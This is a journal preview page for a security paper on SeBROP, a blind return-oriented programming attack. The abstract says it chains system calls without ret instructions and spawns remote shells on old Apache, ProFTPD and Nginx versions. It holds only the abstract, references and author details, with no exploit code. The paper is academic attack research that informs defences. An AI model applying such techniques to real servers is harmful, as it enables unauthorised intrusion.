Skip to main content
SpringerLink
Log in

SeBROP: blind ROP attacks without returns

  • Research Article
  • Published:
Frontiers of Computer Science Aims and scope Submit manuscript

Abstract

Currently, security-critical server programs are well protected by various defense techniques, such as Address Space Layout Randomization(ASLR), eXecute Only Memory(XOM), and Data Execution Prevention(DEP), against modern code-reuse attacks like Return-oriented Programming(ROP) attacks. Moreover, in these victim programs, most syscall instructions lack the following ret instructions, which prevents attacks to stitch multiple system calls to implement advanced behaviors like launching a remote shell. Lacking this kind of gadget greatly constrains the capability of code-reuse attacks.

This paper proposes a novel code-reuse attack method called Signal Enhanced Blind Return Oriented Programming (SeBROP) to address these challenges. Our SeBROP can initiate a successful exploit to server-side programs using only a stack overflow vulnerability. By leveraging a side-channel that exists in the victim program, we show how to find a variety of gadgets blindly without any pre-knowledges or reading/disassembling the code segment. Then, we propose a technique that exploits the current vulnerable signal checking mechanism to realize the execution flow control even when ret instructions are absent. Our technique can stitch a number of system calls without returns, which is more superior to conventional ROP attacks. Finally, the SeBROP attack precisely identifies many useful gadgets to constitute a Turing-complete set. SeBROP attack can defeat almost all state-of-the-art defense techniques. The SeBROP attack is compatible with both modern 64-bit and 32-bit systems.

To validate its effectiveness, We craft three exploits of the SeBROP attack for three real-world applications, i.e., 32-bit Apache 1.3.49, 32-bit ProFTPD 1.3.0, and 64-bit Nginx 1.4.0. Experimental results demonstrate that the SeBROP attack can successfully spawn a remote shell on Nginx, ProFTPD, and Apache with less than 8500/4300/2100 requests, respectively.

This is a preview of subscription content, log in via an institution to check access.

Access this article

Log in via an institution

Price excludes VAT (USA)
Tax calculation will be finalised during checkout.

Instant access to the full article PDF.

Institutional subscriptions

Similar content being viewed by others

References

  1. Roemer R, Buchanan E, Shacham H, Savage S. Return-oriented programming: systems, languages, and applications. ACM Transactions on Information and System Security, 2012, 15(1): 2:1–2:34

    Article  Google Scholar 

  2. Whitehouse, Ollie. An analysis of address space layout randomization on windows vista. Symantec Advanced Threat Research, 2007, 1–14

  3. Lie D, Thekkath C A, Mitchell M, Lincoln P, Boneh D, Mitchell J C, Horowitz M. Architectural support for copy and tamper resistant software. In: Proceedings of International Conference on Architectural Support for Programming Languages and Operating Systems. 2000, 168–177

  4. Bittau A, Belay A, Mashtizadeh A J, Mazières D, Boneh D. Hacking blind. In: Proceedings of IEEE Symposium on Security and Privacy. 2014, 227–242

  5. Lu K, Song C, Lee B, Chung S P, Kim T, Lee W. Aslr-guard: Stopping address space leakage for code reuse attacks. In: Proceedings of ACM Conference on Computer and Communications Security. 2015, 280–291

  6. Bosman E, Bos H. Framing signals — a return to portable shellcode. In: Proceedings of IEEE Symposium on Security and Privacy. 2014, 243–258

  7. Cowan C, Pu C, Maier D, et al. Stackguard: automatic adaptive detection and prevention of buffer-overflow attacks. In: Proceedings of USENIX Security Symposium. 1998, 98: 63–78

    Google Scholar 

  8. Kil C, Jun J, Bookholt C, Xu J, Ning P. Address space layout permutation aslp: Towards fine-grained randomization of commodity software. In: Proceedings of Annual Computer Security Applications Conference. 2006, 339–348

  9. Crane S, Liebchen C, Homescu A, Davi L, Larsen P, Sadeghi A, Brunthaler S, Franz M. Readactor: practical code randomization resilient to memory disclosure. In: Proceedings of IEEE Symposium on Security and Privacy. 2015, 763–780

  10. Crane S J, Volckaert S, Schuster F, Liebchen C, Larsen P, Davi L, Sadeghi A, Holz T, Sutter B D, Franz M. It’s a trap: table randomization and protection against function-reuse attacks. In: Proceedings of ACM Conference on Computer and Communications Security. 2015, 243–255

  11. Snow K Z, Monrose F, Davi L, Dmitrienko A, Liebchen C, Sadeghi A. Just-in-time code reuse: on the effectiveness of fine-grained address space layout randomization. In: Proceedings of IEEE Symposium on Security and Privacy. 2013, 574–588

  12. Maisuradze G, Backes M, Rossow C. What cannot be read, cannot be leveraged? revisiting assumptions of jit-rop defenses. In: Proceedings of USENIX Security Symposium. 2016, 139–156

  13. Bhatkar S, DuVarney D C, Sekar R. Efficient techniques for comprehensive protection from memory error exploits. In: Proceedings of USENIX Security Symposium. 2005, 255–270

  14. Davi L V, Dmitrienko A, Nürnberger S, Sadeghi A. Gadge me if you can: secure and efficient ad-hoc instruction-level randomization for x86 and ARM. In: Proceedings of ACM Symposium on Information, Computer and Communications Security. 2013, 299–310

  15. Wartell R, Mohan V, Hamlen K W, Lin Z. Binary stirring: selfrandomizing instruction addresses of legacy x86 binary code. In: Proceedings of the ACM Conference on Computer and Communications Security. 2012, 157–168

  16. Hiser J, Nguyen-Tuong A, Co M, Hall M, Davidson J W. Ilr: where’d my gadgets go? In: Proceedings of IEEE Symposium on Security and Privacy. 2012, 571–585

  17. Pappas V, Polychronakis M, Keromytis A D. Smashing the gadgets: Hindering return-oriented programming using in-place code randomization. In: Proceedings of IEEE Symposium on Security and Privacy. 2012, 601–615

  18. Backes M, Holz T, Kollenda B, Kopp. P, Nürnberger S, Pewny J. You can run but you can’t read: preventing disclosure exploits in executable code. In: Proceedings of ACM Conference on Computer and Communications Security. 2014, 1342–1353

  19. Backes M, Nürnberger S. Oxymoron: Making fine-grained memory randomization practical by allowing code sharing. In: Proceedings of USENIX Security Symposium. 2014, 433–447

  20. Zhang M, Sahita R, Liu D. executable-only-memory switch(xomswitch): Hiding your code from advanced code reuse attacks in one shot. Black Hat Asia, 2018

  21. Pomonis M, Petsios T, Keromytis A D, Polychronakis M, Kemerlis V P. kr^x: Comprehensive kernel protection against just-in-time code reuse. In: Proceedings of European Conference on Computer Systems. 2017, 420–436

  22. Tang A, Sethumadhavan S, Stolfo S J. Heisenbyte: thwarting memory disclosure attacks using destructive code reads. In: Proceedings of ACM Conference on Computer and Communications Security. 2015, 256–267

  23. Shacham H, Page M, Pfaff B, Goh E, Modadugu N, Boneh D. On the effectiveness of address-space randomization. In: Proceedings of ACM Conference on Computer and Communications Security. 2004, 298–307

  24. Petsios T, Kemerlis V P, Polychronakis M, Keromytis A D. Dynaguard: Armoring canary-based protections against brute-force attacks. In: Proceedings of Annual Computer Security Applications Conference. 2015, 351–360

  25. Williams-King D, Gobieski G, Williams-King K, Blake J P, Yuan X, Colp P, Zheng M, Kemerlis V P, Yang J, Aiello W. Shuffler: fast and deployable continuous code re-randomization. In: Proceedings of USENIX Symposium on Operating Systems Design and Implementation. 2016, 367–382

  26. Wang Z, Wu C, Li J, Lai Y, Zhang X, Hsu W, Cheng Y. Reranz: A light-weight virtual machine to mitigate memory disclosure attacks. In: Proceedings of ACM SIGPLAN/SIGOPS International Conference on Virtual Execution Environments. 2017, 143–156

  27. Giuffrida C, Kuijsten A, Tanenbaum A S. Enhanced operating system security through efficient and fine-grained address space randomization. In: Proceedings of USENIX Security Symposium. 2012, 475–490

  28. Lu K, Lee W, Nürnberger S, Backes M. How to make aslr win the clone wars: runtime re-randomization. In: Proceedings of Annual Network and Distributed System Security Symposium. 2016

  29. Abadi M, Budiu M, Erlingsson Ú, Ligatti J. Control-flow integrity. In: Proceedings of ACM Conference on Computer and Communications Security. 2005, 340–353

  30. Christoulakis N, Christou G, Athanasopoulos E, Ioannidis S. Hcfi: hardware-enforced control-flow integrity. In: Proceedings of ACM Conference on Data and Application Security and Privacy. 2016, 38–49

  31. Pappas V, Polychronakis M, Keromytis A D. Transparent rop exploit mitigation using indirect branch tracing. In: Proceedings of USENIX Security Symposium. 2013, 447–462

  32. Cheng Y, Zhou Z, Yu M, Ding X, Deng R H. Ropecker: A generic and practical approach for defending against rop attacks. In: Proceedings of Annual Network and Distributed System Security Symposium. 2014, 1–14

  33. Davi L, Sadeghi A, Lehmann D, Monrose F. Stitching the gadgets: on the ineffectiveness of coarse-grained control-flow integrity protection. In: Proceedings of USENIX Security Symposium. 2014, 401–416

  34. Kuznetsov V, Szekeres L, Payer M, Candea G, Sekar R, Song D. Codepointer integrity. In: The Continuing Arms Race: Code-Reuse Attacks and Defenses, Code-Pointer Integrity. Association for Computing Machinery and Morgan Claypool, 2018

Download references

Acknowledgements

We thank the FCS editor and all the anonymous reviewers for their constructive comments on this paper. We also thank all people that help refine this work.

Author information

Authors and Affiliations

  1. Department of Computer Science and Technology, Nanjing University, Nanjing, 210023, China

    Tianning Zhang & Hao Huang

  2. School of Computer and Information, Hohai University, Nanjing, 211106, China

    Miao Cai

  3. College of Computer Engineering, Jiangsu University of Science and Technology, Zhenjiang, 212008, China

    Diming Zhang

Authors
  1. Tianning Zhang
    View author publications

    You can also search for this author in PubMed Google Scholar

  2. Miao Cai
    View author publications

    You can also search for this author in PubMed Google Scholar

  3. Diming Zhang
    View author publications

    You can also search for this author in PubMed Google Scholar

  4. Hao Huang
    View author publications

    You can also search for this author in PubMed Google Scholar

Corresponding author

Correspondence to Tianning Zhang.

Additional information

Tianning Zhang received the BS degree from Nanjing University of Chinese Medicine, China in 2013. She is currently working towards the PhD degree in the Department of Computer Science and Technology at Nanjing University, China. Her research interests include software and system security.

Miao Cai received his PhD degree in computer science and technology from Nanjing University, China in 2020. He is now an assistant researcher at Hohai University, China. His research interests include operating system and memory/storage system.

Diming Zhang received his PhD degree in computer science and technology from Nanjing University, China in 2019. In 2011, he joined College of Computer Engineering, Jiangsu University of Science and Technology, China as a lecturer. His current research interests are operating system and parallel computing.

Hao Huang received the BS degree from Xiamen University, China in 1982 and the PhD degree from Nanjing University, China in 1999. He is now a professor in the Department of Computer Science and Technology at Nanjing University, China. His research interests include operating system and system security.

Electronic supplementary material

Rights and permissions

Reprints and permissions

About this article

Check for updates. Verify currency and authenticity via CrossMark

Cite this article

Zhang, T., Cai, M., Zhang, D. et al. SeBROP: blind ROP attacks without returns. Front. Comput. Sci. 16, 164818 (2022). https://doi.org/10.1007/s11704-021-0342-8

Download citation

  • Received:

  • Accepted:

  • Published:

  • DOI: https://doi.org/10.1007/s11704-021-0342-8

Keywords

Search

Navigation